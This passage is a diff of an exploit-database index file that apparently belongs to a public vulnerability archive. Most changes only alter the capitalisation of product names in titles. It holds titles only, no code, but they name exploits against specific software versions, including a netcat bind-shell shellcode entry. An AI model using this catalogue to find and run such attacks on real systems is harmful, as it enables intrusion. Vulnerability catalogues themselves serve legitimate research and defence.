36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution PoC",2015-04-27,"Jay Turla",multiple,remote,0 36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.PLS' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 -36844,platforms/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0 +36844,platforms/php/webapps/36844.txt,"Wordpress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0 36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0 @@ -33253,7 +33253,7 @@ id,file,description,date,author,platform,type,port 36857,platforms/lin_x86/shellcode/36857.c,"Linux/x86 - Execve /bin/sh Shellcode Via Push (21 bytes)",2015-04-29,noviceflux,lin_x86,shellcode,0 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux/x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0 -36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80 +36860,platforms/php/webapps/36860.txt,"Wordpress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80 36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80 36863,platforms/php/webapps/36863.txt,"Joomla Machine Component - Multiple SQL Injections",2012-02-20,the_cyber_nuxbie,php,webapps,0 @@ -33307,11 +33307,11 @@ id,file,description,date,author,platform,type,port 36921,platforms/lin_x86/shellcode/36921.c,"Linux/x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0 36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web",2015-05-06,Vulnerability-Lab,ios,webapps,0 36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - Denial of Service POC",2015-05-04,beford,linux,dos,0 -36907,platforms/php/webapps/36907.txt,"WordPress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 -36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 +36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 Plugin - Multiple Persistent Cross-Site Scripting / Cross-Site Request Forgery / File Upload",2015-05-04,"Felipe Molina",php,webapps,0 +36908,platforms/lin_x86/shellcode/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0 36965,platforms/php/webapps/36965.txt,"Omnistar Live - Cross-Site Scripting / SQL Injection",2012-03-13,sonyy,php,webapps,0 36966,platforms/linux/local/36966.txt,"LightDM 1.0.6 - Arbitrary File Deletion",2012-03-13,"Ryan Lortie",linux,local,0 -36967,platforms/php/webapps/36967.txt,"Max's Guestbook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +36967,platforms/php/webapps/36967.txt,"Max's GuestBook 1.0 - Multiple Remote Vulnerabilities",2012-03-14,n0tch,php,webapps,0 36968,platforms/php/webapps/36968.txt,"Max's PHP Photo Album 1.0 - 'id' Parameter Local File Inclusion",2012-03-14,n0tch,php,webapps,0 36969,platforms/windows/dos/36969.txt,"Citrix 11.6.1 - Licensing Administration Console Denial of Service",2012-03-15,Rune,windows,dos,0 36970,platforms/php/webapps/36970.txt,"JPM Article Script 6 - 'page2' Parameter SQL Injection",2012-03-16,"Vulnerability Research Laboratory",php,webapps,0 @@ -33323,7 +33323,7 @@ id,file,description,date,author,platform,type,port 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 - setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 - Local Buffer Overflow",2012-03-08,"Julien Ahrens",windows,local,0 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 -36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 +36930,platforms/multiple/webapps/36930.txt,"Wordpress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 @@ -33335,26 +33335,26 @@ id,file,description,date,author,platform,type,port 36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 - 'issuer' Parameter Cross-Site Scripting",2012-03-11,MustLive,java,webapps,0 36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance - Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443 36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal - Persistent Cross-Site Scripting",2015-05-07,"Filippo Roncari",xml,webapps,0 -36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 +36942,platforms/php/webapps/36942.txt,"Wordpress Freshmail Plugin 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80 36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal",2015-05-07,Vulnerability-Lab,ios,webapps,0 36944,platforms/php/webapps/36944.txt,"Synology Photo Station 5 DSM 3.2 - 'photo_one.php' Script Cross-Site Scripting",2012-03-12,"Simon Ganiere",php,webapps,0 -36945,platforms/hardware/remote/36945.txt,"TP-LINK TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection",2012-03-12,l20ot,hardware,remote,0 +36945,platforms/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' Parameter HTML Injection",2012-03-12,l20ot,hardware,remote,0 36946,platforms/php/webapps/36946.txt,"Wikidforum 2.10 - Advanced Search - Multiple Field SQL Injection",2012-03-12,"Stefan Schurtz",php,webapps,0 36947,platforms/php/webapps/36947.txt,"Wikidforum 2.10 - Search Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",php,webapps,0 36948,platforms/php/webapps/36948.txt,"Wikidforum 2.10 - Advanced Search Multiple Field Cross-Site Scripting",2012-03-12,"Stefan Schurtz",php,webapps,0 36949,platforms/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5272 36950,platforms/php/webapps/36950.txt,"Syncrify Server 3.6 Build 833 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,5800 36951,platforms/php/webapps/36951.txt,"SynaMan 3.4 Build 1436 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 -36952,platforms/php/webapps/36952.txt,"WordPress N-Media Website Contact Form with File Upload 1.5 Plugin - Local File Inclusion",2015-05-08,T3N38R15,php,webapps,0 +36952,platforms/php/webapps/36952.txt,"Wordpress N-Media Website Contact Form with File Upload 1.5 Plugin - Local File Inclusion",2015-05-08,T3N38R15,php,webapps,0 36953,platforms/php/webapps/36953.txt,"SynTail 1.5 Build 566 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",php,webapps,0 -36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80 +36954,platforms/php/webapps/36954.txt,"Wordpress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80 36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0 -36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - File Upload and Execute",2015-05-08,Metasploit,php,remote,80 -36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 -36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36957,platforms/php/remote/36957.rb,"Wordpress RevSlider 3.0.95 Plugin - File Upload and Execute",2015-05-08,Metasploit,php,remote,80 +36958,platforms/php/webapps/36958.txt,"Wordpress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36959,platforms/php/webapps/36959.txt,"Wordpress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 -36961,platforms/php/webapps/36961.txt,"WordPress Ad Inserter Plugin 1.5.2 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 +36961,platforms/php/webapps/36961.txt,"Wordpress Ad Inserter Plugin 1.5.2 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36962,platforms/windows/remote/36962.rb,"Adobe Flash Player - NetConnection Type Confusion",2015-05-08,Metasploit,windows,remote,0 36963,platforms/linux/webapps/36963.txt,"Alienvault OSSIM/USM 4.14/4.15/5.0 - Multiple Vulnerabilities",2015-05-08,"Peter Lapp",linux,webapps,0 36964,platforms/java/remote/36964.rb,"Novell ZENworks Configuration Management - Arbitrary File Upload",2015-05-08,Metasploit,java,remote,443 @@ -33363,7 +33363,7 @@ id,file,description,date,author,platform,type,port 36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 36977,platforms/php/webapps/36977.pl,"CreateVision CreateVision CMS - 'id' Parameter SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 -36979,platforms/php/webapps/36979.sh,"WordPress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 +36979,platforms/php/webapps/36979.sh,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 Plugin - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Buffer Overflow Exploit",2015-05-11,evil_comrade,windows,local,0 @@ -33385,7 +33385,7 @@ id,file,description,date,author,platform,type,port 37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 -37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 Plugin - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 +37003,platforms/php/webapps/37003.txt,"Wordpress Booking Calendar Contact Form 1.0.2 Plugin - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 - Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 @@ -33396,7 +33396,7 @@ id,file,description,date,author,platform,type,port 37013,platforms/php/webapps/37013.txt,"NextBBS 0.6 - 'index.php' do Parameter Cross-Site Scripting",2012-03-27,waraxe,php,webapps,0 37014,platforms/windows/dos/37014.py,"iFTP 2.21 - Buffer Overflow Crash PoC",2015-05-14,"dogo h@ck",windows,dos,0 37015,platforms/asp/webapps/37015.txt,"Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities",2012-03-27,demonalex,asp,webapps,0 -37016,platforms/php/webapps/37016.txt,"WordPress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 +37016,platforms/php/webapps/37016.txt,"Wordpress Integrator 1.32 - 'redirect_to' Parameter Cross-Site Scripting",2012-03-28,"Stefan Schurtz",php,webapps,0 37017,platforms/php/webapps/37017.txt,"Invision Power Board 4.2.1 - 'searchText' Parameter Cross-Site Scripting",2012-03-28,sonyy,php,webapps,0 37018,platforms/php/webapps/37018.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter SQL Injection",2013-03-27,"Aditya Modha",php,webapps,0 37019,platforms/php/webapps/37019.txt,"MyBB 1.6.6 - 'index.php' conditions[usergroup][] Parameter Cross-Site Scripting",2013-03-27,"Aditya Modha",php,webapps,0 @@ -33441,31 +33441,31 @@ id,file,description,date,author,platform,type,port 37058,platforms/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,multiple,webapps,8080 37059,platforms/windows/webapps/37059.html,"ManageEngine EventLog Analyzer 10.0 Build 10001 - Cross-Site Request Forgery",2015-05-18,"Akash S. Chavan",windows,webapps,0 37061,platforms/multiple/dos/37061.txt,"Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial Of Service",2012-04-05,"Gabriel Menezes Nunes",multiple,dos,0 -37062,platforms/php/webapps/37062.txt,"VBulletin 4.1.10 - 'announcementid' Parameter SQL Injection",2012-04-04,Am!r,php,webapps,0 -37063,platforms/php/webapps/37063.txt,"WordPress TagGator Plugin - 'tagid' Parameter SQL Injection",2012-04-05,Am!r,php,webapps,0 +37062,platforms/php/webapps/37062.txt,"vBulletin 4.1.10 - 'announcementid' Parameter SQL Injection",2012-04-04,Am!r,php,webapps,0 +37063,platforms/php/webapps/37063.txt,"Wordpress TagGator Plugin - 'tagid' Parameter SQL Injection",2012-04-05,Am!r,php,webapps,0 37064,platforms/win_x86-64/local/37064.py,"Windows 8.0 < 8.1 x64 - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC - Remote Control Script",2015-05-20,Photubias,hardware,remote,0 -37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 +37067,platforms/php/webapps/37067.txt,"Wordpress FeedWordpress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37068,platforms/windows/dos/37068.py,"ZOC SSH Client - Buffer Overflow (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 -37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 -37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 +37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 +37070,platforms/php/webapps/37070.txt,"Wordpress Uploadify Integration Plugin 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,php,webapps,0 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 - Multiple SQL Injections (2)",2012-04-10,"Chokri B.A",php,webapps,0 37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 -37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 +37074,platforms/php/webapps/37074.txt,"Wordpress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80 -37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - agenda-widget-form.php title Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - box_publish_button.php button_value Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - save_successful.php msg Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress - agenda-widget.php Multiple Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - agenda-widget-form.php title Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - box_publish_button.php button_value Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - save_successful.php msg Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for Wordpress - agenda-widget.php Multiple Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injections",2015-05-21,"Filippo Roncari",php,webapps,80 -37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 +37080,platforms/php/webapps/37080.txt,"Wordpress WP Symposium Plugin 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 37083,platforms/php/webapps/37083.txt,"Joomla! Beatz Plugin 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Aung Khant",php,webapps,0 37084,platforms/cgi/webapps/37084.txt,"Munin 2.0~rc4-1 - Remote Command Injection",2012-04-13,"Helmut Grohne",cgi,webapps,0 37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 - 'plug.php' SQL Injection",2012-04-15,AkaStep,php,webapps,0 -37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 +37086,platforms/php/webapps/37086.txt,"Wordpress Yahoo Answer Plugin - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' Field HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0 @@ -33479,7 +33479,7 @@ id,file,description,date,author,platform,type,port 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 37253,platforms/php/webapps/37253.txt,"Paypal Currency Converter Basic For Woocommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 -37254,platforms/php/webapps/37254.txt,"WordPress History Collection 1.1.1 Plugin - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 +37254,platforms/php/webapps/37254.txt,"Wordpress History Collection 1.1.1 Plugin - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 @@ -33487,13 +33487,13 @@ id,file,description,date,author,platform,type,port 37103,platforms/php/webapps/37103.txt,"concrete5 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 -37106,platforms/php/webapps/37106.txt,"WordPress Video Gallery Plugin 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 -37107,platforms/php/webapps/37107.txt,"WordPress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 -37108,platforms/php/webapps/37108.txt,"WordPress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 -37109,platforms/php/webapps/37109.txt,"WordPress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 +37106,platforms/php/webapps/37106.txt,"Wordpress Video Gallery Plugin 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 +37107,platforms/php/webapps/37107.txt,"Wordpress NewStatPress Plugin 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 +37108,platforms/php/webapps/37108.txt,"Wordpress Landing Pages Plugin 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 +37109,platforms/php/webapps/37109.txt,"Wordpress GigPress Plugin 2.3.8 - SQL Injection",2015-05-26,"Adrián M. F.",php,webapps,80 37110,platforms/java/webapps/37110.py,"Apache Jackrabbit - WebDAV XXE Exploit",2015-05-26,"Mikhail Egorov",java,webapps,8080 -37111,platforms/php/webapps/37111.txt,"WordPress MailChimp Subscribe Forms 1.1 Plugin - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 -37112,platforms/php/webapps/37112.txt,"WordPress church_admin Plugin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80 +37111,platforms/php/webapps/37111.txt,"Wordpress MailChimp Subscribe Forms 1.1 Plugin - Remote Code Execution",2015-05-26,woodspeed,php,webapps,80 +37112,platforms/php/webapps/37112.txt,"Wordpress church_admin Plugin 0.800 - Persistent Cross-Site Scripting",2015-05-26,woodspeed,php,webapps,80 37113,platforms/php/webapps/37113.txt,"Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80 37114,platforms/jsp/webapps/37114.txt,"Sendio ESP - Information Disclosure",2015-05-26,"Core Security",jsp,webapps,80 37115,platforms/perl/webapps/37115.txt,"Clickheat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 @@ -33504,7 +33504,7 @@ id,file,description,date,author,platform,type,port 37120,platforms/php/webapps/37120.txt,"Uiga FanClub - 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 37121,platforms/asp/webapps/37121.txt,"BBSXP CMS - Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 -37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 +37123,platforms/php/webapps/37123.txt,"Wordpress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 - (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0 37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 - restore.php filename Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 - install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 @@ -33513,7 +33513,7 @@ id,file,description,date,author,platform,type,port 37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 - filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 - main.php Multiple Function Cross-Site Request Forgery",2012-04-27,AkaStep,php,webapps,0 -37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 +37132,platforms/php/webapps/37132.txt,"Wordpress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php' page Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 @@ -33535,60 +33535,60 @@ id,file,description,date,author,platform,type,port 37151,platforms/php/webapps/37151.txt,"TCPDF 